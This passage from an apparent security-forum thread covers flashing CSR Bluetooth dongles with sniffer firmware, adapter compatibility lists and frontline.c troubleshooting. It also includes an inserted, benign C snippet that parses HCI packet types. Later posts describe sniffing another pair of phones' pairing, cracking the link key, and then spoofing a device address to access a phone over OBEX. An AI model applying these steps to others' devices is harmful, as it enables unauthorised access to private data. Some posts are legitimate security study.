lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}
Have a look at thewheelieking's post (message #105); setting the default passkey may help.

JF1976
09-09-2008, 07:59 AM
OK, so I went off and tried the sniffer mod. All seemed fine until I needed to bring the device back up? The firmware went on, I think; no error was reported by dfutool, but when I plugged into Windows the dongle didn't detect as before! I changed the firmware back to the TDK one it was, set the values to default and all worked again?

I have attached the required dumps. 2 & 8 are null? But all others worked. Hope you can help me, thanks.

---- UPDATE ----

Well, I managed to get Windows to detect my device as a ComProbe, but Linux is unable to use it?

JF1976
09-10-2008, 09:04 AM
OK, so this is what I did extra.

After all was fine with the VID & PID I uploaded the firmware and then

# lsusb
Bus 3 Device 11: ID 0a12:0321 Cambridge Silicon Radio, Ltd

displayed the above? 0321, so I had a look about and found this

# bccmd psget -s 0x0000 0x02cb
USB DFU product ID: 0x0321 (801)

so I changed it to this

# bccmd psset -s 0x0000 0x02cb 0x0002

I booted into Windows and waited a while for device detection etc. to finish, removed my old device from Device Manager and ran a scan for new hardware, and before I knew it I was being asked the usual. Again I selected the bluetoothcomprobe.inf file, but this time it all started working for me and I now have a device listed in Device Manager as

"Frontline Test Equipment Bluetooth ComProbe",

but I am still unable to get it working? Arrrrr, someone give me a clue lol

Dreamlocked
09-14-2008, 05:29 AM
Does anyone know what is the class, in hcid.conf, of an audio headset device?
(As for instance 0x50204 corresponds to a phone).

- DL

Lord MuffloN
09-23-2008, 06:37 PM
Can anyone post an updated list, or name a few good USB Bluetooth adapters that can be used for bluesnarfing amongst other things? I've only found posts saying what core they have, not manufacturers or models, and from what I've googled the list from evilgenius.de seems to be outdated, and finding info on what models use what cores seems to be impossible!

celtec
10-05-2008, 12:40 AM
I've tried to upgrade a USBBT100 suggested by a forum post, but dfutool gets the error: Can't find any DFU devices.
Can someone help me understand which of the USB dongles listed in this thread can be used to upgrade to the Frontline DFU firmware without problems?
Many thanks in advance
celtec

djails
10-20-2008, 07:02 PM
Hi all,
I own a Belkin F8T001 ver 2 USB Bluetooth dongle, and it has a BlueCore2-External chip:

# lsusb -s 3:26
Bus 003 Device 026: ID 050d:0084 Belkin Components
# hciconfig hci0 revision
hci0: Type: USB
BD Address: 00:0A:3A:57:26:86 ACL MTU: 192:8 SCO MTU: 64:8
HCI 16.14
Chip version: BlueCore02-External
Max key size: 56 bit
SCO mapping: HCI

I changed the USB VID & PID to 0a12:0002 (using "bccmd psset"), and flashed the dongle with airsnifferdev47bc2.dfu (using "dfutool"). All went well, and it seems the dongle is in raw mode:


# lsusb -s 3:27
Bus 003 Device 027: ID 0a12:0002 Cambridge Silicon Radio, Ltd
# hciconfig
hci0: Type: USB
BD Address: 00:0A:3A:57:26:86 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:18 acl:0 sco:0 events:0 errors:0
TX bytes:3 acl:0 sco:0 commands:1 errors:0
I haven't done anything else (not sure whether it is required to switch to Windows and run the FTS4BT program ...).
From another computer (00:15:AF:F9:5F:96), I l2ping a paired BT headset (00:13:17:48:60:97). Using the bluetooth sniffer, I tried capturing the ping packets using frontline:


# ./frontline -d hci0 -s
# ./frontline -d hci0 -f 7
# ./frontline -d hci0 -S 00:13:17:48:60:97@00:15:AF:F9:5F:96
# ./frontline -d hci0 -e
Unknown type: 4

# ./frontline -d hci0 -s
It seems the sniffer doesn't... sniff! I also tried sniffing pairing packets, but no success there either. The only output of "frontline -d hci0 -e" is "unknown type 4" and "unknown type 1" every now and then.
Questions:
Is it possible to turn a BC2-ext dongle into a sniffer with the airsnifferdev47bc2.dfu firmware?
Should I use another firmware?
Did I miss a step when flashing the firmware (use FTS4BT, for example)?
Is there a problem with my invocations of frontline?


Thanks guys and congrats to DrGreen for a great tut !

bofh28
11-17-2008, 04:10 PM
After searching the forums for usb bluetooth dongle I have made a list of usb bluetooth dongles that should work in BT and be flashable. It would be nice if someone added this list to the hcl on the wiki.

usb bluetooth adapters compatible with backtrack
belkin F8T001 ver 2
flashed, but not sniffing
http://forums.remote-exploit.org/showpost.php?p=103881&postcount=152

D-Link DBT-120 rev. C (bluetooth v 1.1)
works
http://forums.remote-exploit.org/showpost.php?p=90639&postcount=128

From http://www.evilgenius.de/2007/04/10/bluetooth-dongle-with-csr-chipset-and-flash-or-external-memory-using-flash/
Fujitsu Siemens Bluetooth dongles S26361-F3214-L10
works

Linksys USB BT-100 Rev 1(older units only, the newer ones seem to use a broadcom chipset and won't flash)
works

Cellink BTA-6030 Bluetooth Adapter
works but not available

Aircable Host XR (class 1, sma connector)
works
http://www.evilgenius.de/2007/08/13/updates-on-aircable-host-xr-30km-bluetooth-link/

DELOCK 61478 (class 2)
Toshiba PA3455U-1BTM (class 2)
works
http://forums.remote-exploit.org/showpost.php?p=67132&postcount=81


dongles to AVOID:
D-Link dbt-122 has a broadcom chipset

A7eng eb502-HCI
works only with factory firmware and doesn't appear to be available anymore

TBW-104UB
ROM
http://bluetoothsecurity.wordpress.com/list-of-bluetooth-hardware-for-hacking-purposes/

Kensington Bluetooth USB Adapter 2.0 33348 (Rev. 5.1.0.1700 and Rev. 6.0.1.5100)
broadcom
http://us.kensington.com/html/1492.html

IOgear GBU321
broadcom BCM2045
http://www.hawkee.com/shop/prod/653273/reviews/review_75852 in the reviews section

IOgear GBU421
user reported

johnix666
11-18-2008, 09:59 PM
I bought a D-Link DBT-120 and I confirm it works!
Thanx bofh28

bofh28
11-19-2008, 08:36 AM
I bought a D-Link DBT-120 and I confirm it works!
Thanx bofh28

You are welcome.

akegameesou
11-23-2008, 10:16 PM
johnix666,


I have read through Dr_GrEen's howtos, watched several vids etc. I have the D-Link DBT-120 Bluetooth USB device also. However, I cannot seem to get it to scan as many have posted, using commands such as 'hcitool scan hci0'.

I am currently using my laptop with Backtrack3 and my DBT-120 Bluetooth device, and I have been reading Dr_GrEen's blogspot and these forums to get an answer, to no avail. I would be grateful if you or anyone here can help me to get my dongle working with BackTrack 3.

How do I get a copy of the sniffer firmware airsnifferdev46bc4.dfu and frontline.c? Is it purchased, or can I just ask for a copy here?

FYI the device is recognized by BT3 on my laptop, but things like 'hcitool scan hci0' do not work when trying to scan for my cell phone's Bluetooth services.

Help would be much appreciated.

Thanks
Ake

bofh28
11-24-2008, 10:57 AM
johnix666,
How do I get a copy of the sniffer firmware airsnifferdev46bc4.dfu and frontline.c? Is it purchased, or can I just ask for a copy here?

Ake

Legally you need to spend $10000 to purchase the FTS4BT system from http://www.fte.com/
Using their firmware without purchasing it is illegal.

HighPointSecurity
11-24-2008, 06:37 PM
Before you can use commands like hcitool scan hci0, you first have to enable hci0 by entering "hciconfig hci0 up" ...
Did you do this??

HighPointSecurity
11-24-2008, 06:45 PM
As far as I know the chip type has to be: Manufacturer: Cambridge Silicon Radio (10)

Good luck ;)

bofh28
11-24-2008, 08:17 PM
As far as I know the chip type has to be: Manufacturer: Cambridge Silicon Radio (10)

Good luck ;)

And avoid the ones with ROM in the configuration as they are not flash updateable. Unfortunately there is no way to tell a good chipset from a bad one without buying it and trying it.

akegameesou
11-26-2008, 11:23 PM
Yes, I had enabled my device with 'hciconfig hci0 up'. The device is enabled fine. Following is the output of the device using 'hciconfig -s hci0'

bt ~ # hciconfig -a hci0
hci0: Type: USB
BD Address: 00:17:9A:2B:5D:53 ACL MTU: 384:8 SCO MTU: 64:8
UP RUNNING
RX bytes:79 acl:0 sco:0 events:8 errors:0
TX bytes:30 acl:0 sco:0 commands:8 errors:0
Features: 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'D81ZFKB1'
Class: 0x000104
Service Classes: Unspecified
Device Class: Computer, Desktop workstation
HCI Ver: 2.0 (0x3) HCI Rev: 0x77b LMP Ver: 2.0 (0x3) LMP Subver: 0x77b
Manufacturer: Cambridge Silicon Radio (10)

As you can tell by the output this bluetooth dongle is supported as spoken of on these forums and is one that works.

So, I do not have the firmware/software because I do not want to spend thousands of dollars, just like everyone else, but I would like to perform scans on my own devices for educational purposes obviously. What can I do with Backtrack 3 and my current DBT-120 Bluetooth dongle with factory settings to connect to or scan my mobile device?

Can anyone point me to any documentation on this, or provide more intel as to how I can, or why I cannot, see any results when I issue the command 'hcitool scan hci0'?

I appreciate all the help and responses.

Ake

bofh28
11-27-2008, 08:43 PM
hciconfig hci* revision

And if you see EXT, excellent, but if you see ROM you are no go.

akegameesou
11-27-2008, 10:18 PM
Here is the output of the command you mention

bt ~ # hciconfig hci* revision
hci0: Type: USB
BD Address: 00:15:9C:2A:5E:54 ACL MTU: 384:8 SCO MTU: 64:8
HCI 19.2
Chip version: BlueCore4-External
Max key size: 56 bit
SCO mapping: HCI

bofh28
11-28-2008, 03:04 PM
Here is the output of the command you mention

Chip version: BlueCore4-External


That device can be flashed, but doing so is illegal.

akegameesou
11-28-2008, 09:24 PM
What do I flash it with? Can you point me to documentation online or provide me with firmware to flash?

Can I not just use it as is without flashing?

Do you have any idea why I cannot use the command 'hcitool scan hci0' to list my Bluetooth phone in the output?

All your help is appreciated.

Ake

bofh28
11-28-2008, 10:07 PM
What do I flash it with? Can you point me to documentation online or provide me with firmware to flash?

Can I not just use it as is without flashing?

Do you have any idea why I cannot use the command 'hcitool scan hci0' to list my Bluetooth phone in the output?

All your help is appreciated.

Ake

What are you trying to do? If you want a Bluetooth sniffer you will need to flash the device with a special firmware that allows sniffing. Doing this without purchasing the firmware is illegal. I don't think anyone on this site will provide you with the firmware as that too is illegal. If memory serves you need two devices. One to sniff, one to scan.

Yes you can use the device without flashing it. It should work fine to connect your phone or pda to PC/laptop.

I don't know why your command isn't working. Perhaps bluetooth is disabled on the phone or setup not to be found??

I am not a bluetooth expert, in fact I don't own any bluetooth equipment.

lizdainis
12-12-2008, 10:43 AM
Need help
I did everything and when I write
hcitool scan hci0
"Device is not available: Nosuch device"
What did I do wrong?

JF1980
12-14-2008, 08:15 AM
From what I can make out, all Bluetooth hacks still need you to be paired with the victim?

Thick_James
12-29-2008, 12:41 AM
Just a shot in the dark: are you using VMware? If you are, you can try connecting it to the VM and then try configuring it. I got that same error until I realized it was still connected to my host and not the guest. I felt so stupid lmao. That was just a thought, so forgive me in advance if I have insulted your intelligence.

imported_dragracekid
01-04-2009, 06:54 PM
Hello all,
I have an IOgear GBU421. I was wondering if there is a way to flash it? I've searched with no success. Thank you for your help.

bofh28
01-05-2009, 01:52 PM
Hello all,
I have an IOgear GBU421. I was wondering if there is a way to flash it? I've searched with no success. Thank you for your help.

do
# hciconfig hci* revision

And if you see EXT it is flashable but if you see ROM it can't be flashed. Post your results please so I can update the list.

imported_dragracekid
01-05-2009, 07:21 PM
do
# hciconfig hci* revision

And if you see EXT it is flashable but if you see ROM it can't be flashed. Post your results please so I can update the list.

I may have done it wrong but this is what I get.


hci0: Type: USB
BD Address: 00:02:72:15:40:DD ACL MTU: 1017:8 SCO MTU: 64:0
Firmware 0.67 / 14

bofh28
01-05-2009, 09:12 PM
I may have done it wrong but this is what I get.


hci0: Type: USB
BD Address: 00:02:72:15:40:DD ACL MTU: 1017:8 SCO MTU: 64:0
Firmware 0.67 / 14

Odd. Very odd. There are several lines of output that are missing. There should something like the following after your output:
HCI 16.14
Chip version:
Max key size:
SCO mapping:

Since the information is missing I am going to guess that the adapter is not flashable. Return it to the place you bought it, if you can. I have a list of adapters that are known to be flashable at http://forums.remote-exploit.org/showpost.php?p=107124&postcount=153
I will add the gbu421 as one NOT to buy.

simplepr
01-12-2009, 08:16 AM
Hi all, it is great to participate in this forum. I really like the kind of work being done here. I have a few questions that I would really appreciate answers on. I have read this whole post to make sure that I don't ask something that has been answered, but I could have missed something.
1. Can someone post a picture of the correct adapter? There are so many different models that it makes it difficult to know which is the correct one.
I am looking at the D-Link 120, but there are so many different models.
2. The adapter that works, is it USB 2.0 or 1.1?
3. Yes or no, are two USB dongles needed? One for sniffing and one for connecting?
4. The firmware update on the device, is it for Windows, or does it need to be updated for BT3 as well?

Realize I am not asking how to do anything I will read the tutorials and perform whatever needs to be done and hopefully make contributions to the thread with my findings.

simplepr
01-12-2009, 11:55 AM
Guys,
Here is a list of devices with the CSR chipset. Interesting that there are many more than found in this forum. But does this mean they work or are we still looking for specific ones.
xxxjasmine.org.uk/~simon/mirrors/bluez/devicesxxx

bofh28
01-12-2009, 02:24 PM
Hi all, it is great to participate in this forum. I really like the kind of work being done here. I have a few questions that I would really appreciate answers on. I have read this whole post to make sure that I don't ask something that has been answered, but I could have missed something.
1. Can someone post a picture of the correct adapter? There are so many different models that it makes it difficult to know which is the correct one.
I am looking at the D-Link 120, but there are so many different models.
2. The adapter that works, is it USB 2.0 or 1.1?
3. Yes or no, are two USB dongles needed? One for sniffing and one for connecting?
4. The firmware update on the device, is it for Windows, or does it need to be updated for BT3 as well?

Realize I am not asking how to do anything I will read the tutorials and perform whatever needs to be done and hopefully make contributions to the thread with my findings.

There is a link that provides a list of adapters that are known to work:
http://forums.remote-exploit.org/showpost.php?p=107124&postcount=153
3. Yes I think two adapters are still needed. Can someone verify this?
4. To use one of the listed adapters as a sniffer you would need to flash the adapter with firmware that you did not purchase. Since you didn't purchase it doing so is illegal.

simplepr
01-12-2009, 10:34 PM
4. To use one of the listed adapters as a sniffer you would need to flash the adapter with firmware that you did not purchase. Since you didn't purchase it doing so is illegal.

Well that's interesting; in the tutorial there is nothing about the legality of this modification, and it looks to me that all that is being done is modifying some parameters in the device itself ("someone correct me if I am wrong"). Also, the way I read it, the firmware upgrade is needed if working on Windows, but I could be wrong.

bofh28
01-13-2009, 03:52 PM
Well that's interesting; in the tutorial there is nothing about the legality of this modification, and it looks to me that all that is being done is modifying some parameters in the device itself ("someone correct me if I am wrong"). Also, the way I read it, the firmware upgrade is needed if working on Windows, but I could be wrong.

Since you own the device you can usually do anything you want to it i.e. run over it in a car, take a hammer to it, use it as a paper weight, etc. Modifying some parameters in the device is usually OK (always check your local laws) but if you break it you have voided the warranty so don't expect a replacement.

The firmware you need to flash allows the dongle to sniff bluetooth traffic and is only available from frontline www.fte.com and costs about $10,000 US. For that price you also get a dongle that supports Bluetooth 2.1+EDR. I haven't seen anyone finding a bluetooth 2.1 dongle that is flashable.

Something interesting I have seen is that some new wireless cards are also bluetooth adapters. It took them long enough to figure out that bluetooth uses the same frequency as 802.11b and g. I don't own any of these new adapters, so I can't comment about anything other than that they exist.

whitedraven
01-13-2009, 07:04 PM
great tutorial!!!
Got BT up and running, but beyond that my curiosity ended as the signal strength limited me, and I'm still racing into learning other areas.

simplepr
01-13-2009, 10:50 PM
Since you own the device you can usually do anything you want to it i.e. run over it in a car, take a hammer to it, use it as a paper weight, etc. Modifying some parameters in the device is usually OK (always check your local laws) but if you break it you have voided the warranty so don't expect a replacement.

The firmware you need to flash allows the dongle to sniff bluetooth traffic and is only available from frontline and costs about $10,000 US. For that price you also get a dongle that supports Bluetooth 2.1+EDR. I haven't seen anyone finding a bluetooth 2.1 dongle that is flashable.

Something interesting I have seen is that some new wireless cards are also bluetooth adapters. It took them long enough to figure out that bluetooth uses the same frequency as 802.11b and g. I don't own any of these new adapters, so I can't comment about anything other than that they exist.

Ok, got the picture now bofh28. Thanks for the information! Now I see what is really going on. That said, I think we can come up with our own firmware; that way we are not running into someone else's business. I am willing to make any contributions to the development of new firmware, even if it takes destroying a few devices by testing. I can also support the investigation process of the chipset, i.e. op codes etc...
Do you guys think it's doable? I know bluetooth is a standard and there is much information available if you google it!

simplepr
01-22-2009, 07:49 AM
Ok, I have managed to make a sniffing dongle work both in BT3 and in Windows. :) It is a dLink BT120 C1 flashed with 47bc4.dfu. I am waiting on my second dongle to arrive so that I can start scanning. My intention is to pass on what I learn from all this, so I am inclined to write a step by step tutorial for all this. From what I read here there is not much to do, since bluetooth technology has evolved and is no longer vulnerable ("Yeah right!" :D), just like every OS and software out there. I do not believe that it is no longer vulnerable; it's just that none have been found yet or published, but this is what it's all about, right? Finding the vulnerabilities and properly documenting them so that we can protect ourselves and our customers, companies etc.... So I want to test, test, test and post my findings; those who wish to do the same are welcome to post.

OnkelDoktor
06-07-2009, 05:33 PM
So, I read almost the whole post and learned a lot from doing so. I got all the pieces (firmware, frontline for windows, frontline.c) together except the flashable bt dongle.

But before buying one so that I can experiment on my own I have some questions left:
Did someone successfully sniff a phone<->phone pairing (from, let's say, 2m distance)? My understanding is that the pc<->phone pairing is sniffed by the dongle right next to the dongle used to pair (since the USB slots are close together on the PC). What impact does a small distance (<5m) have on the accuracy of the sniffing?

How do I proceed after successfully cracking the link key? Are there known procedures to exploit the gathered information? Like storing the link key, spoofing the bt_addr and connecting as the second phone "in disguise"?

Somehow all I read so far stops after cracking the PIN/LK... but that is where it gets interesting. The LK is useless if I can't go further from there.

So before investing in a dongle (D-Link DBT-120 rev. C ...with the risk of getting the one with the non-ext firmware?!) it would be nice if someone could comment on the above.

Cheers

EDIT:

My friend has a bluetooth dongle with

hci0: Type: USB
BD Address: 00:09:DD:50:0A:6E ACL MTU: 384:8 SCO MTU: 64:8
HCI 19.2
Chip version: BlueCore4-External
Max key size: 56 bit
SCO mapping: HCI
He was so kind to allow me playing around with it and now I got

hci0: Type: USB
BD Address: 00:09:DD:50:0A:6E ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:6 acl:0 sco:0 events:0 errors:0
TX bytes:0 acl:0 sco:0 commands:0 errors:0
:D

I tested sniffing 2 mobile phones pairing. They were ~2m away from my desktop computer with the sniffing dongle and it worked like a charm. Captured the pairing, cracked the pin and the link key.

Now I wonder how I/the attacker can take advantage of this. I imagine one could spoof the bt_addr, change the class to 0x5a0204, store the cracked link key in /var/lib/bluetooth/<spoofed-address>/linkkeys and try to connect to the phone. Unfortunately I can only change the bt_addr of the sniffing stick (but that one is unusable because of the change firmware). I don't want to change the firmware back :(
Any comments on how to proceed with the findings of the sniffing-cracking-process?

donpee
06-15-2009, 12:51 PM
Hey, since you got a link key you don't need a sniffer anymore. Just spoof the bt address of your scanner stick (it should be a BC chip) and do obex ftp...
more in here:
hxxp://seguridadmobile.blogspot.com/2008/11/sniffing-bluetooth-pairing.html

OnkelDoktor
06-15-2009, 11:29 PM
Hello donpee,
thanks for your reply. I know that I wouldn't actually need the sniffer anymore when I plan to "continue" the attack. But I still want to play around with it (and demonstrate it to my friend and others). The Link you provided is very interesting and sums it all up quite nicely.
But I still struggle with "how to disguise your PC as the other phone".

What do I have to change?
1.) obviously the bt_addr (that is clear to me)
2.) what about the device class? Do I have to change it via hcid.conf, to 0x5A0204 for example?

Where to store the key? I guess it should be /var/lib/bluetooth/<spoofed-address>/linkkeys

Is the key given by btpincrack in reverse order? Compare hXXp://seguridadmobile.blogspot.com/2008/11/sniffing-bluetooth-pairing.html -> bottom half, where he checks if its the right key

And finally, is there an obexftp alternative/variant where you can browse the device like a local filesystem with ls and cd? This xml format is quite nasty for the eyes, and all these commands just to learn about the next subfolder name... seems so uncomfortable :eek:

Thanks for all your help so far :)
Regards

donpee
06-16-2009, 01:02 PM
Hey doktor, as soon as you've got a key you don't need to change anything in your equipment, and a key is already in the BT /var/lib/bluetooth/<spoofed-address>/linkkeys folder.
In the link hXXp://seguridadmobile at the bottom there is a BT screen with the cracked key and pin, and under it are the keys in the attacked paired devices, just for comparison....
I think you've got to type all that crap, there is no alternative....
Try the 'attack' tool included in BT3.
Why do you want to "disguise your PC as the other phone"? It's a device class matter.
good luck

rudolf
07-06-2009, 10:50 PM
Something that I think has gone wrong on this thread is the distinction of when you need a flashed dongle and when you need it original. BTscanner won't work with a flashed, and (obviously) frontline won't work without.
So does anything other than frontline.c make use of a flashed dongle?

Where do I find a copy of the frontline.c source?

Last but not least, a DBT-120 H/W Ver.:B3 works; a Typhoon 20007 can be flashed and looks fine but doesn't return data. I only tried version 47; if anything else works, I'll report.

donpee
07-07-2009, 01:02 AM
You've got to use the sniffer and scanner dongles at the same time in frontline.c or dr.green's bluesmash. Google for the frontline.c source.
stay in touch

rudolf
07-07-2009, 02:04 PM
I googled "frontline.c source" yesterday, and I did it again today just to be sure. But it wasn't to be found. Could anybody help?

Also, are you saying I need two dongles to use frontline.c and bluesmash? I'm sniffing the traffic between two phones.

Archangel-Amael
07-07-2009, 05:40 PM
I googled "frontline.c source" yesterday, and I did it again today just to be sure. But it wasn't to be found. Could anybody help?


Frontline.c should already be in BT3; look for it with locate frontline.c
BTW, ".c" is the file extension for a program or application written in C, so there really is no "source" other than the mentioned file.

rudolf
07-07-2009, 08:09 PM
I have googled...
I have searched BT2 and BT3...
I saw the link to sorbo/darkircop.org on the bluesmash page.
I know what .c means...
I would even copy the .h too :)

So instead of telling me the obvious, could someone help me find the source for frontline please?

Archangel-Amael
07-07-2009, 08:21 PM
I have googled...
So instead of telling me the obvious, could someone help me find the source for frontline please?

So instead of telling you the obvious, here
http://secdev.zoller.lu/btsniff/frontline.c
The direct download.
No need to apologize.
Cheers

rudolf
07-07-2009, 10:32 PM
Thank you.

skydoctor
08-18-2009, 08:37 PM
Hi folks,

I followed dr.green's tutorial with a dlink dbt-120 adapter and got to the point where I can see the UP RUNNING RAW, and on running csrsniff.c (aka frontline.c) with the -t option I can see an incrementing timer. After that, when I enter something like:

./csrsniff -d hci0 -S 00:1D:6E:12:65:95@00:1F:6B:88:FF:BC

then all I see is a bunch of "Unknown type: 4" messages. I tried it before pairing two mobile phones, during file transfer and with two linux PCs, but I get the same message every time. From the csrsniff.c file, this refers to a check in the program to confirm reception of an HCI_ACLDATA_PKT (which has code 0x02), but instead all it receives right now is 0x04 (which is an HCI_EVENT_PKT).

Any pointers for a solution??
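
The packet type byte skydoctor describes, as an added example that is not code from the thread or from csrsniff.c/frontline.c: a small parser for the four HCI packet types a raw HCI socket delivers (command 0x01, ACL 0x02, SCO 0x03, event 0x04), showing that event packets such as Command Complete are legitimate traffic that a reader expecting only ACL data will reject. The sample frames are constructed; the type values and header layouts are those of the Bluetooth HCI spec (and BlueZ's hci.h).

```c
/* Added example (not from the thread, csrsniff.c or frontline.c): classify a
 * raw HCI packet by its leading type byte. A reader expecting only ACL data
 * (0x02) that receives an event packet (0x04) is the "Unknown type: 4" case.
 * Type values and header layouts follow the Bluetooth HCI spec (BlueZ hci.h). */
#include <stdint.h>
#include <stddef.h>

enum { HCI_COMMAND_PKT = 0x01, HCI_ACLDATA_PKT = 0x02,
       HCI_SCODATA_PKT = 0x03, HCI_EVENT_PKT = 0x04 };
struct hci_pkt_info {
    uint8_t  type;     /* HCI_*_PKT value, 0 when unknown or truncated */
    uint16_t handle;   /* ACL: 12-bit connection handle */
    uint8_t  pb_flag;  /* ACL: packet boundary flag (bits 12-13) */
    uint8_t  evcode;   /* EVENT: event code, e.g. 0x0E Command Complete */
    uint16_t payload;  /* payload length declared in the header */
};

/* Parses the little-endian HCI header into *out. Returns the packet type, or
 * 0 when the type byte is not one of the four HCI types or data is truncated. */
int classify_hci_packet(const uint8_t *buf, size_t len, struct hci_pkt_info *out)
{
    struct hci_pkt_info info = {0};
    if (len < 1) return 0;
    switch (buf[0]) {
    case HCI_ACLDATA_PKT:          /* type, handle+flags (2), length (2) */
        if (len < 5) return 0;
        info.handle  = (uint16_t)(buf[1] | (buf[2] << 8)) & 0x0FFF;
        info.pb_flag = (buf[2] >> 4) & 0x03;
        info.payload = (uint16_t)(buf[3] | (buf[4] << 8));
        break;
    case HCI_EVENT_PKT:            /* type, event code (1), length (1) */
        if (len < 3) return 0;
        info.evcode  = buf[1];
        info.payload = buf[2];
        break;
    case HCI_COMMAND_PKT:          /* type, opcode (2), length (1) */
    case HCI_SCODATA_PKT:          /* type, handle (2), length (1) */
        if (len < 4) return 0;
        info.payload = buf[3];
        break;
    default:
        return 0;                  /* not an HCI type byte at all */
    }
    info.type = buf[0];
    if (out) *out = info;
    return info.type;
}
/* Constructed samples: a Command Complete event (for HCI_Reset, opcode 0x0C03)
 * and one 4-byte ACL fragment on connection handle 1 with PB flag 0b10. */
static const uint8_t sample_event[] = {0x04, 0x0E, 0x03, 0x01, 0x03, 0x0C, 0x00};
static const uint8_t sample_acl[] = {0x02, 0x01, 0x20, 0x04, 0x00, 0xAA, 0xBB, 0xCC, 0xDD};
```

A sniffer loop that only dispatches on HCI_ACLDATA_PKT should silently skip (or log and count) the event packets rather than treating every 0x04 as an error.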

AdamElite
08-21-2009, 06:12 PM
I'm kinda confused with the commands of bluesnarfer and bluebugger.

Can someone please give me an example of what I could put in.
(Sorry for the noobiness)

Again sorry for the noobiness, but can someone post a video of exactly everything that happens.
Detail for details, instructions and all. I learn better when I see it, rather than looking at words.

manulu
10-08-2009, 06:28 AM
this is my bluetooth (http://www.nexxtsolutions.com/dpg/ntProducts.aspx?ctg=10&sctg=63#)
not sure about Part number: NW200NXT02

hci0: Type: USB
BD Address: 00:15:83:B3:D0:3B ACL MTU: 672:3 SCO MTU: 48:1
UP RUNNING
RX bytes:657 acl:0 sco:0 events:19 errors:0
TX bytes:66 acl:0 sco:0 commands:17 errors:0
Features: 0xff 0x3e 0x05 0x00 0x18 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ACER_ONE-677339'
Class: 0x10010c
Service Classes: Object Transfer
Device Class: Computer, Laptop
HCI Ver: 1.2 (0x2) HCI Rev: 0x1f4 LMP Ver: 1.2 (0x2) LMP Subver: 0x1f4
Manufacturer: Integrated System Solution Corp. (57)

hci0: Type: USB
BD Address: 00:15:83:B3:D0:3B ACL MTU: 672:3 SCO MTU: 48:1
Unsupported manufacturer


Ok, I have managed to make a sniffing dongle work both in BT3 and in Windows. :) It is a dLink BT120 C1 flashed with 47bc4.dfu
will this work (http://www.newegg.com/Product/Product.aspx?Item=N82E16833127117)?


My intention is to pass on what I learn from all this, so I am inclined to write a step by step tutorial for all this.

This is good news!!!

thanks

@ToMiK
10-31-2009, 09:32 AM
First of all, wanted to thank everyone for posting info on this thread, especially Dr Green! Managed to sniff a Bluetooth pairing and crack the Link Key for a university assignment :D

@ manulu

As far as I know the DLink DBT120 you have linked to should work. Pretty sure the Rev C1 is the only one of the versions that is orange and black.

Also wanted to mention that the DLink DBT120 Revision C1 worked fine for me as well with the firmware update.

=n00baday=
11-04-2009, 12:41 PM
Hey everyone,

I've combined all the necessary commands to set up bluetooth into a shell script. Hopefully this will take away a lot of confusion. Can someone please take a look at it? :D

The topic is called "Bluetooth setup (Blue-Buildv1.0c)" and it's inside the BT3 howtos section.